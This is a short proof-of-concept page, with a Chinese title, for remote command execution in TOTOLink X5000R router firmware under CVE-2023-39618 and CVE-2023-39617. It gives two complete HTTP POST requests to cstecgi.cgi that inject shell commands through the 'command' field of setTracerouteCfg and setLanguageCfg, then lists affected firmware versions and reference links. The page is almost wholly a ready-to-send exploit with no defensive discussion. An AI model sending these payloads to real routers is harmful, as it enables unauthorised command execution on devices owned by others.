TOTOLink X5000R 远程命令执行 附POC

X5000R_Firmware    B20210419（transition）

POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: xxx.xxx.xxxContent-Length: 86Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://xxx.xxx.xxxReferer: http://xxx.xxx.xxx/login.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"rn pwd > /web/gxh_hrp.txt rn","num":"2","topicurl":"setTracerouteCfg"}

https://nvd.nist.gov/vuln/detail/CVE-2023-39618https://sedate-class-393.notion.site/X5000R_setTracerouteCfg-3567fd9f93d84afab0d81cd8c063f9a1https://www.totolink.net/data/upload/20220412/fe7937cc79ddaca13b8c7e49ee1c2860.rar

TOTOLINK X5000R_V9.1.0cu.2089_B20211224

TOTOLINK X5000R_V9.1.0cu.2350_B20230313

X5000R_EasyMesh_Firmware    V9.1.0cu.2089_B20211224X5000R_EasyMesh_Firmware    V9.1.0cu.2350_B20230313

POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: xxx.xxx.xxxContent-Length: 89Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://xxx.xxx.xxxReferer: http://xxx.xxx.xxx/login.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"1.2.3.4 rn ls>/web/gxh_hrp.txt rn","num":"2","topicurl":"setLanguageCfg"}

https://nvd.nist.gov/vuln/detail/CVE-2023-39617https://sedate-class-393.notion.site/X5000R_setLanguageCfg-ee7eb0d4cd5d43e9983296200371eff1https://www.totolink.net/data/upload/20220412/a8e1a07b9ac5a55d013f6978204fd83e.rarhttps://www.totolink.net/data/upload/20230330/32b35a2a2ede3a948f8c5df15ac2631e.rar